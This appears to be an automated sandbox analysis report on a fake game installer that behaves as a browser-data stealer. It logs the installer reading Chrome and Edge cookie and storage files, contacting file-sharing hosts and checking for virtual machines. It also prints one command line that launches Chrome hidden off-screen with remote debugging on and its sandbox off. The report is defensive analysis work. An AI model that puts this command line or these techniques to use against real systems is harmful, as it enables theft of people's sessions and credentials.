Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstLaunchAfterInstallation VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1417002460 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4683256203 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5367203117 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5367203117 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5622580005 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5622580005 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5795694722 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5859486270 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5859486270 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5a9c282b-ef39-4af3-8fe8-5806dd03ee4a.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6516896632 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7011884383 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7011884383 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7245361316 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7606393495 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7606393495 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\77d22a10-bffc-4dc5-99e7-4fbb607cb190.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7838756049 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrocef_low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2\en-US VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6E8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6E8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE703.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE707.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE70B.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE70B.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE723.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE783.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE783.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE795.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE795.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7A7.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7A7.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7B8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7B8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7DB.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7EF.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7EF.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7F0.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7F1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
ATT&CK tactics and techniques (the numbers preceding some techniques are the counts shown beside them in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 211 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Windows Service; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 Windows Service; 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Masquerading; 111 Disable or Modify Tools; 121 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Timestomp; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 21 Security Software Discovery; 1 Network Service Discovery; 2 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 34 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 1 Remote Access Software; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1584251 | Sample: Yoranis Setup.exe | Startdate: 05/01/2025 | Architecture: WINDOWS | Score: 72

Start
  DNS/IP: sb.scorecardresearch.com; ntp.msn.com; 9 other IPs or domains
  Signature: Drops large PE files
  Started: YoransSetup.exe 16; Yoranis Setup.exe 12 787

YoransSetup.exe
  DNS/IP: api.gofile.io 94.139.32.3, 443, 49771, 51695 ENIX-ASFR Belgium; file.io 143.244.215.221, 443, 49772, 51696 COGENT-174US United States; 2 other IPs or domains
  Signatures: Attempt to bypass Chrome Application-Bound Encryption; Suspicious powershell command line found; Tries to harvest and steal browser information (history, passwords, etc); Excessive usage of taskkill to terminate processes
  Started: cmd.exe (three instances); 59 other processes

Yoranis Setup.exe
  Dropped: C:\Users\user\AppData\...\YoransSetup.exe, PE32+; C:\Users\user\AppData\Local\...\nsis7z.dll, PE32; C:\Users\user\AppData\Local\...\nsExec.dll, PE32; 34 other files (none is malicious)
  Started: cmd.exe 1

cmd.exe (first instance under YoransSetup.exe)
  Started: WMIC.exe; conhost.exe
cmd.exe (second instance under YoransSetup.exe)
  Signature: Suspicious powershell command line found
  Started: 2 other processes
cmd.exe (third instance under YoransSetup.exe)
  Started: 2 other processes
cmd.exe (under Yoranis Setup.exe)
  Started: conhost.exe; 2 other processes
59 other processes (under YoransSetup.exe)
  DNS/IP: chrome.cloudflare-dns.com 172.64.41.3, 443, 49774, 50333 CLOUDFLARENETUS United States; 239.255.255.250, 1900 unknown Reserved
  Signature: Excessive usage of taskkill to terminate processes
  Started: curl.exe; msedge.exe; 110 other processes

WMIC.exe
  Signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries memory information (via WMI often done to detect virtual machines)
curl.exe
  DNS/IP: api.ipify.org 104.26.12.205, 49766, 80 CLOUDFLARENETUS United States
msedge.exe
  DNS/IP: dns.quad9.net 9.9.9.9, 443, 49926, 51537 QUAD9-AS-1US United States; sb.scorecardresearch.com 18.173.166.9, 443, 55728 MIT-GATEWAYSUS United States
